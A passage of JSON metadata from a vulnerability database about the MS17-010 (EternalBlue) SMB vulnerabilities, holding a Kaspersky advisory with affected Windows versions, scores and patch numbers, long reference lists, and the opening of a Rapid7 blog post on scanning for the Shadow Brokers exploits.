"CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96709", "SMNTC-96705"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2020-12-03T07:12:31", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2020-12-03T07:12:31", "rev": 2}}, "objectVersion": "1.6"}, "lastseen": "2020-12-03T07:12:31", "differentElements": ["cvss2", "cvss3"], "edition": 5}, {"bulletin": {"id": "KLA10977", "hash": "7b443cff91f985d9a978bd8311ba61b88386c665678d1b5656fa06bb560f86bf", "type": "kaspersky", "bulletinFamily": "info", "title": "\r KLA10977Multiple vulnerabilities in Microsoft Server Message Block (SMB) ", "description": "### *Detect date*:\n03/14/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Server Message Block 1.0(SMBv1). Malicious users can exploit these vulnerabilities to execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Windows XP Service Pack 2 \nMicrosoft Windows XP Service Pack 3 \nMicrosoft Windows XP Embedded Service Pack 3 \nMicrosoft Windows Vista Service Pack 2 \nMicrosoft Windows 7 Service Pack 1 \nMicrosoft Windows 8 \nMicrosoft Windows 8.1 \nMicrosoft Windows RT 8.1 \nMicrosoft Windows 10 \nMicrosoft Windows Server 2003 Service Pack 2 \nMicrosoft Windows Server 2008 Service Pack 2 \nMicrosoft Windows Server 2008 R2 Service Pack 1 \nMicrosoft Windows Server 2012 \nMicrosoft Windows Server 2012 R2 \nMicrosoft Windows Server 2016\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[Customer Guidance for WannaCrypt attacks](<https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>) \n[Securelist](<https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/>) \n[MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) \n[CVE-2017-0143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143>) \n[CVE-2017-0144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144>) \n[CVE-2017-0145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145>) \n[CVE-2017-0146](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146>) \n[CVE-2017-0147](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147>) \n[CVE-2017-0148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows Vista](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Vista-4/>)\n\n### *CVE-IDS*:\n[CVE-2017-0143](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>)9.3Critical \n[CVE-2017-0144](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>)9.3Critical \n[CVE-2017-0145](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>)9.3Critical \n[CVE-2017-0146](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146>)9.3Critical \n[CVE-2017-0147](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147>)4.3Warning \n[CVE-2017-0148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148>)9.3Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4012217](<http://support.microsoft.com/kb/4012217>) \n[4012215](<http://support.microsoft.com/kb/4012215>) \n[4012216](<http://support.microsoft.com/kb/4012216>) \n[4012606](<http://support.microsoft.com/kb/4012606>) \n[4013198](<http://support.microsoft.com/kb/4013198>) \n[4013429](<http://support.microsoft.com/kb/4013429>) \n[4012212](<http://support.microsoft.com/kb/4012212>) \n[4012214](<http://support.microsoft.com/kb/4012214>) \n[4012213](<http://support.microsoft.com/kb/4012213>) \n[4012598](<http://support.microsoft.com/kb/4012598>)\n\n### *Exploitation*:\nThis vulnerability can be exploited by the following malware:", "published": "2017-03-14T00:00:00", "modified": "2020-11-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA10977", "reporter": "Kaspersky Lab", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2020-12-03T07:12:31", "history": [], "viewCount": 515, "enchantments": {"dependencies": {"modified": "2020-12-03T07:12:31", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"], "type": "malwarebytes"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-12-03T07:12:31", "rev": 2, "value": 7.1, "vector": "NONE"}}, "objectVersion": "1.6"}, "lastseen": "2020-12-03T07:12:31", "differentElements": ["cvss2", "cvss3", "href", "modified", "references", "title"], "edition": 6}], "viewCount": 521, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:42030"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2018-16794"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-08-18T11:18:34", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-08-18T11:18:34", "rev": 2}}, "objectVersion": "1.6", "_object_type": "robots.models.kaspersky.KasperskyBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.kaspersky.KasperskyBulletin"]}], "rapid7community": [{"published": "2017-05-24T23:14:26", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2017-05-25T17:57:11", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2017-05-25T17:57:11", "rev": 2}}, "id": "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "objectVersion": "1.5", "title": "Vulnerability Management Tips for the Shadow Brokers Leaked Exploits", "bulletinFamily": "blog", "viewCount": 184, "reporter": "Ken Mizota", "references": [], "enchantments_done": [], "type": "rapid7community", "_object_type": "robots.models.rss.RssBulletin", "history": [{"lastseen": "2017-05-09T14:47:56", "bulletin": {"published": "2017-05-09T14:06:06", "enchantments": {}, "id": "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "objectVersion": "1.4", "title": "Vulnerability Management Tips for the Shadow Brokers Leaked Exploits", "bulletinFamily": "blog", "viewCount": 32, "reporter": "Ken Mizota", "references": [], "type": "rapid7community", "history": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- [DocumentBodyStart:09493b2e-1b09-410b-94f5-219d718e7ddf] --><div class=\"jive-rendered-content\"><p><a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"30294\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/pdxbek\">Rebekah Brown</a> and the Rapid7 team have delivered a spot-on breakdown of the recent Shadow Brokers exploit and tool release. Before you read any further, if you haven&#8217;t done so already, please <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7842\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/04/18/the-shadow-brokers-leaked-exploits-faq\">read her post</a>. It&#8217;s probably not the only post you&#8217;ve read on this topic, but it is cogent, well-constructed and worth the 5 minutes.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>Back with me? With all of the media attention and discussion in the infosec community, it would not surprise me to hear that a security team still wondered aloud: &ldquo;Nation-state intrigue makes for scintillating reading, but what do I do with this news?&#8221;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>So long as there are attackers and defenders in infosec, the Rapid7 community continues to be on the front lines of the struggle. But, in such a position, which action is prudent? Purchasing an underground bunker outright may not be a sound decision for you.&#160; However, there are practical actions you can take.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Don't waste a learning moment</h2><p>You invest in building and maintaining your <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsolutions%2Fvulnerability-management%2F\" target=\"_blank\">vulnerability management program</a>. This includes making sure you have visibility to the latest threats and perhaps <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7752\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2016/12/19/giving-the-gift-of-time-nexpose-adaptive-security-improvements\">automating your response</a>. The exploits thrust onto the world stage by the Shadow Brokers, while newsworthy, distill down to a seemingly normal set of patches and updates. As Rebekah's post states:</p><blockquote class=\"jive-quote\"><p dir=\"ltr\"><span style=\"font-family: arial, helvetica, sans-serif;\"><span style=\"font-size: 12pt; color: #000000;\">I</span><span style=\"font-size: 12pt; color: #000000;\">f you are unsure if you are up to date on these patches, we have checks for all of them in</span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fnexpose%2F\" target=\"_blank\"><span style=\"font-size: 12pt; color: #000000;\"> </span><span style=\"font-size: 12pt; color: #1155cc;\">Rapid7 Nexpose</span></a><span style=\"font-size: 12pt; color: #000000;\"> and</span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\"><span style=\"font-size: 12pt; color: #000000;\"> </span><span style=\"font-size: 12pt; color: #1155cc;\">Rapid7 InsightVM</span></a><span style=\"font-size: 12pt; color: #000000;\">. These checks are all included in the </span><span style=\"font-size: 12pt; color: #000000;\">Microsoft Hotfix</span><span style=\"font-size: 12pt; color: #000000;\"> scan template.</span><span style=\"font-size: 12pt; color: #000000;\"> </span></span></p></blockquote><p>It turns out, if you&#8217;re maintaining your <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Ffundamentals%2Fvulnerability-management-and-scanning%2F\" target=\"_blank\">vulnerability scans</a>, and getting the visibility to your Windows assets, you already have the visibility you need. But that doesn&#8217;t mean you have to treat this event as business as usual.&#160; Perhaps you&#8217;d like to see how your security program fares when up against vaunted Shadow Brokers trove?</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>Here are a few ideas you can try based on a mix of newer and long-standing capabilities.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Look for what you need</h2><p>If you want to efficiently identify the presence of Shadow Brokers&#8217; leaked vulnerabilities, and you don&#8217;t want to change your existing Scan regime, create a new Scan template.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>You&#8217;ll find creating a new <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fhelp.rapid7.com%2Finsightvm%2Fen-us%2F%23Files%2FWorking_with_scan_templates_and_tuning_scan_performance.html\" rel=\"nofollow\" target=\"_blank\">Scan Template</a> in the Administration tab. Start off by naming your template:</p><p><span style=\"font-size: 12pt; font-family: Calibri; color: #000000;\"> <span style=\"color: #000000; font-size: 12pt; font-family: Calibri;\"><a 